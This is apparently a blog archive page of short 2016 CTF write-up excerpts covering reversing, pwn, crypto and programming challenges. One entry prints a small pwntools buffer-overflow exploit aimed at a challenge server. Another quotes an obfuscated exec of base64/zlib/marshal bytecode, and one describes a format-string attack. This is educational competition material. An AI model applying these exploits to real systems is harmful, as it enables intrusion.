HITCON CTF 2016::Handcrafted::Rev-50

Posted on by and filed under HITCON CTF 2016.

We were given a python file for this challege #!/usr/bin/env python # -*- coding: utf-8 -*- import marshal, zlib, base64 exec(marshal.loads(zlib.decompress(base64.b64decode(‘eJyNVktv00AQXm/eL0igiaFA01IO4cIVCUGFBBJwqRAckLhEIQmtRfPwI0QIeio/hRO/hJ/CiStH2M/prj07diGRP43Hs9+MZ2fWMxbnP6mux+oK9xVMHPFViLdCTB0xkeKDFEFfTIU4E8KZq8dCvB4UlN3hGEsdddXU9QTLv1eFiGKGM4cKUgsFCNLFH7dFrS9poayFYmIZm1b0gyqxMOwJaU3r6xs9sW1ooakXuRv+un7Q0sIlLVzOCZq/XtsK2oTSYaZlStogXi1HV0iazoN2CV2HZeXqRQ54TlJRb7FUlKyUatISsdzo+P7UU1Gb1POdMruckepGwk9tIXQTftz2yBaT5JQovWvpSa6poJPuqgao+b9l5Aj/R+mLQIP4f6Q8Vb3g/5TB/TJxWGdZr9EQrmn99fwKtTvAZGU7wzS7GNpZpDm2JgCrr8wrmPoo54UqGampFIeS9ojXjc4E2yI06bq/4DRoUAc0nVnng4k6p7Ks0+j/S8z9V+NZ5dhmrJUM/y7JTJeRtnJ2TSYJvsFq3CQt/vnfqmQXt5KlpuRcIvDAmhnn2E0t9BJ3SvB/SfLWhuOWNiNVZ+h28g4wlwUp00w95si43rZ3r6+fUIEdgOZbQAsyFRRvBR6dla8KCzRdslar7WS+a5HFb39peIAmG7uZTHVm17Czxju4m6bayz8e7J40DzqM0jr0bmv9PmPvk6y5z57HU8wdTDHeiUJvBMAM4+0CpoAZ4BPgJeAYEAHmgAUgAHiAj4AVAGORtwd4AVgC3gEmgBBwCPgMWANOAQ8AbwBHgHuAp4D3gLuARwoGmNUizF/j4yDC5BWM1kNvvlxFA8xikRrBxHIUhutFMBlgQoshhPphGAXe/OggKqqb2cibxwuEXjUcQjccxi5eFRL1fDSbKrUhy2CMb2aLyepkegDWsBwPlrVC0/kLHmeCBQ==’)))) After looking at the decompressed data, I realized that the header had been removed, so I compiled a pyc file and got the correct header. Here is my Get_Bytecodes.py #!/usr/bin/env python # -*- coding:… Read more »

HITCON CTF 2016::Flame::PPC-150

Posted on by and filed under HITCON CTF 2016.

This was my first encounter with Power PC, so this challenge was definitely fun learning experience for me. Here is my best attempt at the decompiled source code. #include &ltstdio.h&gt #include &ltstdlib.h&gt #include &ltstring.h&gt int global_values[] = {0xCFE,0x859,0x95D,0x871,0x40D,6,0xADE,0xFA8,0x561,0x9DA, \ 0x878,0x682,0xFA9,0xF5F,0x25E,0xDB0,0xFBF,0xBC6,0xD38,0x95D,0xD09,0x7ED,0x307, \ 0x1C0,0x399,0x956,0xA45,0x292,0xC8A,0x92F,0x4A,0x964,0x194,0x9DA,0x11F}; int main(){ char input[35]; int *checked_against = global_values; int i; //print welcome string… Read more »

TUM CTF 2016::lolcpp::pwn-250

Posted on by and filed under TUM CTF 2016.

We were given the source code for this challenge. #include <cstdint> #include <cstdio> #include <cstdlib> #include <cstring> #include <functional> #include <memory> #include <unistd.h> constexpr size_t entry_len = 0x50; void strip_newline(char *buf, size_t size) { char *p = &size[buf]; while (p >= buf) { if (0 == *p or ‘\n’ == *p) { *p = 0;… Read more »

CSAW Qual 2016::Rock::Rev-100

Posted on by and filed under CSAW Quals 2016.

There is a struct in this program. struct Rock{ void *fp; int pass_fail; string *user_input1; string *user_input2; string *flag_str; }; Three interesting functions, which I have called init_struct, check_len_and_xor, and is_valid_key See the rest of this writeup here.

CSAW Qual 2016::Warmup::Pwn-50

Posted on by and filed under CSAW Quals 2016.

This was a very easy challenge. Basically, there was a win function at the address that is bring printed : 0x40060D. This function can be called with a simple buffer overflow. Here is my Exploit.py from pwn import * win = 0x40060D payload = “A”*72 payload += p64(win) con = remote(‘pwn.chal.csaw.io’,8000) print con.recvline() print con.recvline()… Read more »

CSAW Qual 2016::Sleeping Guard::Crypto-50

Posted on by and filed under CSAW Quals 2016.

With this challenge, they gave us an encrypted png. After a bit of trial and error I realized all I had to do was xor the first few bytes of the encrypted file with the standard header of a png. I just downloaded a sample file. Here is my get_key.py ecrypted = open(‘sleeping.png’,’rb’).read().decode(‘base64’) png =… Read more »

MMA CTF 2016::Palindrome::Prog-50

Posted on by and filed under MMA CTF 2016.

The challenge reads as follows: Your task is to make a palindrome string by rearranging and concatenating given words. Input Format: N … Answer Format: Rearranged words separated by space. Each words contain only lower case alphabet characters. Example Input: 3 ab cba c Example Answer: ab c cba You have to connect to ppc1.chal.ctf.westerns.tokyo:31111(TCP)… Read more »

MMA CTF 2016::Reverse Box::Rev-50

Posted on by and filed under MMA CTF 2016.

I found an unintended solution to this one, so I was pretty happy about that. The contents of the flag leads me to believe that I was intended to reverse a substitution cypher. But anyways, here is my solution. It was pretty obvious that I was dealing with some kind of cypher. The most important… Read more »

MMA CTF 2016::Judgement::Pwn-50

Posted on by and filed under MMA CTF 2016.

After opening the binary up in IDA, it was pretty obvious that we needed to exploit a format string vulnerability. It looks like the flag was declared as a global variable, which means it will have a static address in the .bss Section. This definitely makes our lives easier. See the full writeup here.